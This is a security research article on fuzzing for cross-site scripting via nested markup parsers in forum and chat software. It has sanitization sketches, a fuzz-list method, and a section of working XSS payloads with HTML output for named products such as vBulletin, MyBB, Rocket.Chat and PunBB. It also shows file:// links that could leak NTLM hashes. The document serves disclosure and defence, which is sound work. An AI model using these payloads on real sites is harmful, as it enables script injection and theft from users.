Fuzzing for XSS via nested parsers condition

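Parsers

What are parsers, and what do they do in messages?

Parsers are applications that find a substring in a text. When parsing a message, they can find a substring and convert it into the correct HTML code.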

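Well-known parsers in messages

HTML as message markup

Some well-known applications allow whitelisted HTML tags such as <b>, <u>, and <img> (WordPress, Vanilla Forums, etc.). For developers without a hacker mindset, it is easy to overlook some possibilities when sanitizing these tags. That is why we consider allowing even a limited list of tags one of the worst choices a developer can make.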

BBcode

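BBcode is a lightweight markup language used to format messages in many Internet forums. It was first introduced in 1998. Here are a few examples of BBcode and the corresponding HTML code:

Input	Output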
[b]text[/b]	<b>text</b>
[i]text[/i]	<i>text</i>
[url]http://google.com/[/url]	<a href="http://google.com/">http://google.com/</a>
[img]/favicon.ico[/img]	<img src="/favicon.ico" />

Markdown

Markdown is a lightweight markup language for creating formatted text using a plain-text editor. It was first introduced in 2004. Some examples:

Input	Output
**text**	<b>text</b>
*text*	<i>text</i>
[text](http://google.com/)	<a href="http://google.com/">text</a>
![text](/favicon.ico)	<img alt="text" src="/favicon.ico" />

AsciiDoc

AsciiDoc is a human-readable document format that is semantically equivalent to DocBook XML but uses plain-text markup conventions. It was introduced in 2002:

Input	Output
*text*	<b>text</b>
_text_	<i>text</i>
http://google.com/[text]	<a href="http://google.com/">text</a>
image:/favicon.ico[text]	<img alt="text" src="/favicon.ico" />

reStructuredText

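reStructuredText (RST, ReST, or reST) is a file format for textual data, used primarily in the Python programming language community for technical documentation. It was first introduced in 2002:

Input	Output
**text**	<b>text</b>
*text*	<i>text</i>
`text <http://google.com/>`_	<a href="http://google.com/">text</a>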
.. image:: /favicon.ico:alt: text	<img alt="text" src="/favicon.ico" />

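Other well-known parsers

Besides text markup parsers in messages and comments, you can find URL and email parsers, as well as smart URL parsers that understand not only HTTP links but also image or YouTube links and convert them to HTML. You can also find emoticons and emojis that are converted from text into images, links to user profiles, and clickable hashtags:

Input	Output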
:)	<img src="/images/smile.jpg" alt=":)">
:smile:	<img src="/images/smile.jpg" alt=":smile:">
[email protected]	<a href="mailto:[email protected]">[email protected]</a>
https://www.youtube.com/watch?v=L_LUpnjgPso	<iframe src="https://www.youtube.com/embed/L_LUpnjgPso"></iframe>
http://google.com/image.jpg	<img src="http://google.com/image.jpg">
#hashtag	<a href="search?q=%23hashtag">#hashtag</a>
@username	<a href="/profile/username">@username</a>

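What do we know about bugs in this functionality?

If you google "markdown XSS", you will find examples of missing sanitization of HTML characters and of URL schemes. Let's start with those.

Missing sanitization of HTML characters

A vulnerability exists when a parser converts user input to HTML and does not sanitize HTML characters at the same time. This can affect characters such as the opening angle bracket < (0x3c), which opens new HTML tags, and the quotes " (0x22) and ' (0x27), which start and end HTML attribute values:

Input	Output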
[url]http://google.com/<img src=s onerror=alert(1)>[/url]	<a href="http://google.com/%3cimg%20src=s%20onerror=alert(1)%3e">http://google.com/<img src=s onerror=alert(1)></a>
[img]/favicon.ico?id="onload="alert(1)[/img]	<img src="/favicon.ico?id="onload="alert(1)" />
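
The second row of the table can be reproduced with a minimal sketch. The converter below is a hypothetical one-tag BBcode parser written for illustration, not code taken from any real forum engine; `img_unsafe` and `img_escaped` are assumed names.

```python
import html
import re

# Hypothetical single-tag BBcode converter, for illustration only.
IMG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE)

def img_unsafe(message: str) -> str:
    # The captured value is pasted into the attribute as-is.
    return IMG_RE.sub(lambda m: f'<img src="{m.group(1)}" />', message)

def img_escaped(message: str) -> str:
    # html.escape() turns &, <, >, " and ' into entities before insertion.
    return IMG_RE.sub(
        lambda m: f'<img src="{html.escape(m.group(1), quote=True)}" />',
        message,
    )

payload = '[img]/favicon.ico?id="onload="alert(1)[/img]'
print(img_unsafe(payload))   # the quote closes src and starts a new attribute
print(img_escaped(payload))  # the quote stays inside the src value
```

Escaping at the moment the value is written into the attribute keeps the quote from ending the `src` value. It does not by itself address the nested-parser problem discussed later in this article.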

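Missing sanitization of the "javascript:" URL scheme

This vulnerability can be exploited when a parser converts user input that contains URLs. If such a parser does not sanitize the "javascript:" URL scheme, an attacker can execute arbitrary JavaScript and perform an XSS attack:

Input	Output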
[url=javascript:alert(1)]Click me![/url]	<a href="javascript:alert(1)">Click me!</a>
[video]javascript:alert(1)[/video]	<iframe src="javascript:alert(1)"></iframe>

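Missing sanitization of the "file:" URL scheme

This is another vulnerability that arises when a parser converts user input that contains URLs. This time the cause is insufficient sanitization of the "file://" URL scheme. The vulnerability can lead to critical attacks on desktop applications, for example reading arbitrary client files with JavaScript, executing arbitrary client files with plain HTML, and leaking NTLM hashes. The leaked hashes can be used for "pass the hash" attacks or offline password brute-force attacks against Windows users:

Input	Output
[url]file://1.3.3.7/test.txt[/url]	<a href="file://1.3.3.7/test.txt">file://1.3.3.7/test.txt</a>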
[video]file://localhost/C:/windows/system32/calc.exe[/video]	<iframe src="file://localhost/C:/windows/system32/calc.exe"></iframe>
[img]file://1.3.3.7/test.jpg[/img]	<img src="file://1.3.3.7/test.jpg">
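
One common way to handle both the "javascript:" and "file:" cases is a scheme allowlist rather than a blocklist. The following is a minimal sketch under that assumption; `ALLOWED_SCHEMES` and `is_allowed_url` are hypothetical names, and the set of permitted schemes would depend on the application.

```python
from urllib.parse import urlsplit

# Assumption: only these schemes may appear in generated links.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

def is_allowed_url(url: str) -> bool:
    # Browsers drop tabs and newlines inside a URL and ignore surrounding
    # whitespace, so normalise the same way before looking at the scheme.
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return False  # malformed URL, reject
    # An empty scheme (relative URL) is rejected too in this strict sketch.
    return scheme in ALLOWED_SCHEMES

for candidate in ("http://google.com/", "javascript:alert(1)",
                  "file://1.3.3.7/test.txt", "java\tscript:alert(1)"):
    print(repr(candidate), is_allowed_url(candidate))
```

Rejecting everything that is not explicitly allowed means unexpected schemes fail closed. An application that needs relative URLs would have to handle the empty-scheme case separately.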

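Decoding

A vulnerability exists when a parser converts user input to HTML and sanitizes HTML characters, but decodes the user input from a known encoding afterwards. HTML-related encodings include urlencode, where " becomes %22, and HTML entities, where " becomes &quot;, &#x22;, or &#34;:

Input	Output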
[url]http://google.com/test%22test%2522test%252522[/url]	<a href="http://google.com/test"test"test""></a>
[url]http://google.com/test&quot;test&amp;quot;test&amp;amp;quot;[/url]	<a href="http://google.com/test"test"test""></a>
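
The ordering problem can be shown with a short sketch. Both functions below are hypothetical and only illustrate the difference between decoding after sanitization and decoding before it; the payload is an assumed example.

```python
import html
from urllib.parse import unquote

def url_tag_decode_last(url: str) -> str:
    # Vulnerable order: sanitize first, then URL-decode the "safe" value.
    safe = html.escape(url, quote=True)
    return f'<a href="{unquote(safe)}">link</a>'

def url_tag_escape_last(url: str) -> str:
    # Safer order: decode first, sanitize as the very last step.
    decoded = unquote(url)
    return f'<a href="{html.escape(decoded, quote=True)}">link</a>'

payload = "http://google.com/test%22onmouseover=alert(1)%20x=%22"
print(url_tag_decode_last(payload))  # %22 turns into a raw quote after escaping
print(url_tag_escape_last(payload))  # the decoded quote is escaped to &quot;
```

Sanitization has to be the last transformation applied to the value. Any decoding step that runs after it can bring the dangerous characters back.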

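Parsers with nested conditions

A nested condition occurs when a single payload is processed by two different parsers and, with some manipulation, lets us inject arbitrary JavaScript into the page. These vulnerabilities are easily overlooked by both developers and hackers.

However, we found that this type of bug can easily be discovered by fuzzing!

Here is a PHP code example of a vulnerable application: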

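<?php
// Converts URLs and email addresses in already-escaped text into clickable links.
function returnClickable($input)
{
    // Parser 1: wrap every URL in an <a> tag.
    $input = preg_replace('/(http|https|files):\/\/[^\s]*/', '<a href="${0}">${0}</a>', $input);
    // Parser 2: wrap every email address in a mailto: link. It also runs over the HTML produced by parser 1.
    $input = preg_replace('/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)(\?\w*=[^\s]*|)/', '<a href="mailto:${0}">${0}</a>', $input);
    // Turn newlines into HTML line breaks.
    $input = preg_replace('/\n/', '<br>', $input);
    return $input . "\n\n";
}
// The input is sanitized once, before either parser runs.
$message = returnClickable(htmlspecialchars($_REQUEST['msg']));
?>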

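The user input is passed as sanitized text to the returnClickable function, which finds URLs and emails and returns HTML code for clickable elements.

At first glance this looks safe, but if you send a string that contains an email inside a URL, the parser returns broken HTML code, and your user input migrates from an HTML attribute value to an HTML attribute name.

Input	Output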
http://google.com/[email protected]?subject='qwe'onmouseover='alert(1)'	<a href="http://google.com/<a href="mailto:[email protected]?subject='qwe'onmouseover='alert(1)'">http://google.com/[email protected]?subject=''onmouseover='alert(1)'</a>">[email protected]?subject=''onmouseover='alert(1)'">http://google.com/[email protected]?subject=''onmouseover='alert(1)'</a></a>
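
To experiment with this behaviour outside PHP, the same two-pass logic can be approximated in Python. This is a rough port for illustration, not the original application: `escape_like_htmlspecialchars` is a hypothetical helper that assumes the ENT_COMPAT behaviour of htmlspecialchars (single quotes left untouched), and the payload uses the placeholder address user@example.com.

```python
import re

def escape_like_htmlspecialchars(text: str) -> str:
    # Assumption: mimics PHP htmlspecialchars() with ENT_COMPAT,
    # which escapes & < > " but leaves single quotes untouched.
    return (text.replace("&", "&amp;").replace("<", "&lt;")
                .replace(">", "&gt;").replace('"', "&quot;"))

URL_RE = re.compile(r"(?:http|https|files)://\S*")
EMAIL_RE = re.compile(
    r"([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)(\?\w*=\S*|)"
)

def return_clickable(text: str) -> str:
    # Parser 1: URLs become links.
    text = URL_RE.sub(
        lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', text)
    # Parser 2: emails become mailto: links, including an email that now
    # sits inside the href attribute written by parser 1.
    text = EMAIL_RE.sub(
        lambda m: f'<a href="mailto:{m.group(0)}">{m.group(0)}</a>', text)
    return text.replace("\n", "<br>")

payload = "http://example.com/user@example.com?subject='x'onmouseover='alert(1)'"
result = return_clickable(escape_like_htmlspecialchars(payload))
print(result)
```

The second substitution writes a new double quote into the middle of the first link's href value. The browser therefore ends the attribute early and reads the rest of the input, including onmouseover, as attribute names and values.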

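Fuzz list building logic

For better understanding, we will show you a vBulletin example. Here is a fragment of the fuzz list for discovering XSS via nested parsers. The vulnerable BBcode tag is [video], and the tag that lets us insert new HTML attributes is [font]: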

[img]http://aaa.ru/img/header.jpg[font=qwe]qwe[/font]qwe[/img]
[VIDEO="qwe[font=qwe]qwe[/font];123"]qwe[/VIDEO]
[VIDEO="qwe;123"]qw[font=qwe]qwe[/font]e[/VIDEO]
[video="youtube;123[font=qwe]qwe[/font]"]https://www.youtube.com/watch?v=jEn2cln7szEq[/video]
[video=twitch;123]https://www.twitch.tv/videos/285048327?collection=-41EjFuwRRWdeQ[font=qwe]qwe[/font][/video]
[video=youtube;123]https://www.youtube.com/watch?v=jEn2cln7szE[font=qwe]qwe[/font][/video]
[video=vimeo;123]https://vimeo.com/channels/staffpicks/285359780[font=qwe]qwe[/font][/video]
[video=mixer;123]https://www.facebook.com/gaming/?type=127929-Minecraft[font=qwe]qwe[/font][/video]
[video=metacafe;123]http://www.metacafe.com/watch/11718542/you-got-those-red-buns-hun/[font=qwe]qwe[/font][/video]
[video=liveleak;123]https://www.liveleak.com/view?i=715_1513068362[font=qwe]qwe[/font][/video]
[video=facebook;123]https://www.facebook.com/vietfunnyvideo/videos/1153286888148775[font=qwe]qwe[/font]/[/video]
[video=dailymotion;123]https://www.dailymotion.com/video/x6hx1c8[font=qwe]qwe[/font][/video]
[FONT=Ari[font=qwe]qwe[/font]al]qwe[/FONT]
[SIZE=11[font=qwe]qwe[/font]px]qwe[/SIZE]
[FONT="Ari[font=qwe]qwe[/font]al"]qwe[/FONT]
[SIZE="11[font=qwe]qwe[/font]px"]qwe[/SIZE]
[email]qwe@qw[font=qwe]qwe[/font]e.com[/email]
[email=qwe@qw[font=qwe]qwe[/font]e.com]qwe[/email]
[url]http://qwe@qw[font=qwe]qwe[/font]e.com[/url]
[url=http://qwe@qw[font=qwe]qwe[/font]e.com]qwe[/url]
[email="qwe@qw[font=qwe]qwe[/font]e.com"]qwe[/email]
[url="http://qwe@qw[font=qwe]qwe[/font]e.com"]qwe[/url]

Step 1

Enumerate all possible strings that can be converted to HTML code and save them to list B:

http://google.com/?param=value
http://username:[email protected]/
[color=colorname]text[/color]
[b]text[/b]
:smile:

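Step 2

Save the lines that let you pass parameters into HTML to list A as insertion points, and mark where the payloads from list B will be inserted. You can also use list C to check HTML character sanitization, Unicode support, or 1-byte fuzzing: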

http://google.com/?param=va%listC%%listB%lue
http://username:pass%listC%%listB%[email protected]/
[color=color%listC%%listB%name]text[/color]

Step 3

Generate the fuzz list using lists A, B, and C:

http://google.com/?param=va<[color=colorname]text[/color]lue
http://username:pass<[b]text[/b][email protected]/
[color=color<:smile:name]text[/color]
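
The three steps can be sketched as a small generator. The list contents below are shortened samples taken from the steps above, the probe characters in `list_c` beyond "<" are an assumption, and `build_fuzz_list` is a hypothetical helper name.

```python
from itertools import product

# List A: insertion points with placeholders for lists C and B.
list_a = [
    "http://google.com/?param=va%listC%%listB%lue",
    "[color=color%listC%%listB%name]text[/color]",
]
# List B: strings that a parser converts to HTML.
list_b = ["[color=colorname]text[/color]", "[b]text[/b]", ":smile:"]
# List C: probe characters (assumed sample).
list_c = ["<", '"', "'"]

def build_fuzz_list(insertion_points, payloads, probes):
    fuzz = []
    # Every insertion point is combined with every probe and every payload.
    for template, probe, payload in product(insertion_points, probes, payloads):
        fuzz.append(
            template.replace("%listC%", probe).replace("%listB%", payload)
        )
    return fuzz

fuzz_list = build_fuzz_list(list_a, list_b, list_c)
print(len(fuzz_list))
print(fuzz_list[0])
```

The size of the result is the product of the three list lengths, so it grows quickly. In practice it may be worth pruning combinations that the target obviously cannot parse.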

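Detection of anomalies

Method 1 – Visual

You can use this method on desktop or mobile applications when you cannot see the HTTP traffic or the HTML source of the returned messages.

Expected result: chunks of HTML code (">, " >, "/>) become visible.

Method 2 – Regular expressions

You can use this method when you apply fully automated fuzzing.

For example, we use a regular expression that searches for an opening HTML tag character inside an HTML attribute.

We applied this fuzzing technique to a vBulletin board using BurpSuite Intruder. We sorted the results table by the seventh column, which contains the true/false result of the regular expression used. At the bottom of the screenshot, you can see the HTML source code of a successful test case, with the substring found by our regular expression rule highlighted.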
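
A check of this kind can be sketched as follows. The pattern is a simplified, hypothetical heuristic written for illustration and is not necessarily the expression used in the tests described here; `ANOMALY_RE` and `looks_broken` are assumed names.

```python
import re

# Heuristic: an attribute value opens with a quote and, before that same
# quote appears again, a "<" followed by a letter shows up.
ANOMALY_RE = re.compile(r"""=(["'])(?:(?!\1)[^<>])*<[a-zA-Z]""")

def looks_broken(html_source: str) -> bool:
    return ANOMALY_RE.search(html_source) is not None

clean = '<a href="http://google.com/">http://google.com/</a>'
broken = ('<a class="video-frame h-disabled" href="a<span style="font-family:'
          'a onmouseover=alert(location) a">a</span>a" data-vcode="000">')

print(looks_broken(clean))
print(looks_broken(broken))
```

A heuristic like this can produce false positives, for example on text that legitimately contains `="` followed by a tag, so matches are best treated as candidates for manual review.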

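Discovered vulnerabilities

This is not a complete list: some vendors have not released patches yet, and there are some findings we cannot disclose.

vBulletin < 5.6.4 PL1, 5.6.3 PL1, 5.6.2 PL2

CVE: not assigned

XSS vector (video BBcode + font BBcode):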

[VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO]

HTML output:

<a class="video-frame h-disabled" href="a<span style="font-family:a onmouseover=alert(location) a">a</span>a" data-vcode="000" data-vprovider="aaa">

MyBB

CVE: CVE-2021-27279

XSS vector (email BBcode + email BBcode with alternative syntax):

[email][email protected]?[[email protected]? onmouseover=alert(1) a]a[/email][/email]

HTML output:

<a href="mailto:[email protected]?<a href="mailto:[email protected]? onmouseover=alert(1) a" class="mycode_email">a" class="mycode_email">[email protected]?[[email protected]? onmouseover=alert(1) a]a</a></a>

PmWiki

CVE: CVE-2021-29231

XSS vector (div title wikitext + font-family wikitext):

%define=aa font-family='a="a'%
 
(:div title='a%aa% a' style='a':)"onmouseover="alert(1)"
test

HTML output:

<div title='a<span  style='font-family: a="a;'> a' style='a' >"onmouseover="alert(1)"</span> <p>test

Rocket.Chat

CVE: CVE-2021-22886

XSS vector (url parser + markdown url):

[ ](http://www.google.com)
www.google.com/pa<http://google.com/onmouseover=alert(1); a|Text>th/a

HTML output:

<a href="http://www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a" target="_blank" rel="noopener noreferrer">www.google.com/pa<a data-title="http://google.com/onmouseover=alert(1); a" href="http://google.com/onmouseover=alert(1); a" target="_blank" rel="noopener noreferrer">Text</a>th/a</a>

XMB

CVE: CVE-2021-29399

XSS vector (URL BBcode + URL BBcode with alternative syntax):

[url]http://a[url=http://onmouseover=alert(1)// a]a[/url][/url]

HTML output:

<a href='http://a<a href='http://onmouseover=alert(1)// a' onclick='window.open(this.href); return false;'>a' onclick='window.open(this.href); return false;'>http://a[url=http://onmouseover=alert(1)// a]a</a></a>

SCEditor < 3 / SMF 2.1 – 2.1 RC3

CVE: not assigned

XSS vector (BBcode + BBcode):

[email]a@a[size="onfocus=alert(1) contenteditable tabindex=0 id=xss q"]a[/email].a[/size]

HTML output:

<a href="mailto:a@a<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font>">a@a<font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">a</font></a><font size="onfocus=alert(1) contenteditable tabindex=0 id=xss q">.a</font>

PunBB

CVE: CVE-2021-28968

XSS vector (email BBcode + url BBcode inside b BBcode):

[email][email protected][b][url]http://onmouseover=alert(1)//[/url][/b]a[/email]

HTML output:

<a href="mailto:[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a">[email protected]<strong><a href="http://onmouseover=alert(1)//">http://onmouseover=alert(1)//</a></strong>a</a>

Vanilla Forums

CVE: not assigned

XSS vector (HTML <img alt> + HTML <img>):

<img alt="<img onerror=alert(1)//"<">

HTML output:

<img alt="<img onerror=alert(1)//" src="src" />

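Recommendations for elimination

Based on our findings, one of the best sanitization options, which protects even parsers with nested conditions, is to encode user input entirely into HTML entities.

For example, let's take a look at Phorum CMS, which has already been patched.

In the latest version of this CMS, one of the BBcodes encodes all user input into HTML entities. When we tried to reproduce the issue on previous versions, it was an XSS. This patch is a really good example: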

my e-mail: [email][email protected][/email]
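
The idea of encoding the whole input can be sketched like this. It is an illustration of the general approach under our own assumptions, not the actual Phorum patch; `encode_all` and `email_tag` are hypothetical names.

```python
import html

def encode_all(text: str) -> str:
    # Every character, not only <, > and quotes, becomes a numeric entity.
    return "".join(f"&#{ord(ch)};" for ch in text)

def email_tag(address: str) -> str:
    encoded = encode_all(address)
    return f'<a href="mailto:{encoded}">{encoded}</a>'

payload = 'user@example.com" onmouseover="alert(1)'
rendered = email_tag(payload)
print(rendered)
# The browser decodes the entities back to the original text for display.
print(html.unescape(encode_all(payload)) == payload)
```

Because the encoded value no longer contains "@", "://", brackets, or quotes as literal characters, a later parser pass has nothing to match on, which is why this approach also holds up in nested conditions.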
